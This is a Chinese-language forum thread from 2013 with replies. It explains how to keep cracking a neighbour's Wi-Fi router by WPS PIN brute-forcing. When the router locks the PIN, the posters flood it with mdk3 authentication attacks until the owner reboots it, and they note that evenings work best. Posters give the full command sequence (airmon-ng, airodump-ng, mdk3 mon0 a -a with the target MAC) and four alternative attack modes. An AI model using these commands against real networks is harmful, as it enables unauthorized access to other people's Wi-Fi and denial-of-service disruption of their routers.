Mdk3-v6攻击路由迫使对方重启路由
众所周知,在我们执行PINPJ的时候,常遇到PIN不动或者PIN几下就出现60秒和300秒后再重试的提示,这是因为路由可能经过我们的不断PIN尝试连接路由,导致路由假死或者直接死机锁PIN了,所以我们可以通过攻击路由迫使主人家主动重启路由后我们又可以继续PJ,周而复始就能成功PJ了,攻击的前提是对方在线才可能重启路由,一般晚上比较适合PINPJ和mdk3攻击我想说的是使用mdk3 时要根据情况选用不同的攻击模式,例如:mdk3 mon0 a -a 40:16:9F:**:2C:B2(40:16:9F:**:2C:B2为你pin死的路由的MAC,注意空格和大小写)-a 模式是贴子上教我们使用的一种攻击模式,那你使用的次数多了,路由自然就免疫了,可能是原贴作者没有考虑到的问题,我在使用的过程中也有这样的问题。经过我的实践发现,使用不同的攻击模式,两三分钟就可以关闭对话框然后重新扫描网络看pin死的路由是不是已经不在了。等待主人重启吧~~~以下四条攻击命令,可以一个个试,看那个模式有用。。。。。。 洋芋果果 发表于 2013-3-17 18:03为什么我下载的里面没有MDK3-V6???????????????
打开终端模拟器输入,sudo mdk3,(运行mdk3),sudo ifconfig -a(检测网卡),sudo airmon-ng start wlan0(模拟端口),sduo airodump-ng mon0(扫描MAC),CTRL +C(停止扫描),sudo mdk3 mon0 a -a MAC(开始攻击),CTRL+C(完成攻击)。注意命令之间有空格! 菜鸟来学习 :lol 菜鸟来学习 呵,估计楼主也没用过吧,MAC地址大小写无所谓的。。。
之前就看过这样说的。。。COPY的? 4 种 在哪里 啊 宝贝 谢谢楼主分享 支持一个啦。。。 菜鸟来学习 识宝专家 发表于 2013-3-12 06:43 static/image/common/back.gif
4 种 在哪里 啊 宝贝
mdk3 mon0 a -p 40:16:9F:**:2C:B2(40:16:9F:**:2C:B2为你pin死的路由的MAC,注意空格和大小写)
mdk3 mon0 a -d 40:16:9F:**:2C:B2(40:16:9F:**:2C:B2为你pin死的路由的MAC,注意空格和大小写)
mdk3 mon0 a -f 40:16:9F:**:2C:B2(40:16:9F:**:2C:B2为你pin死的路由的MAC,注意空格和大小写)
mdk3 mon0 a -g 40:16:9F:**:2C:B2(40:16:9F:**:2C:B2为你pin死的路由的MAC,注意空格和大小写)
不就这几种模式嘛,我自己用只发现a -a有效,其他的没用,可能不同路由也有关系吧。 为什么我下载的里面没有MDK3-V6??????????????? 菜鸟来学习 菜鸟来学习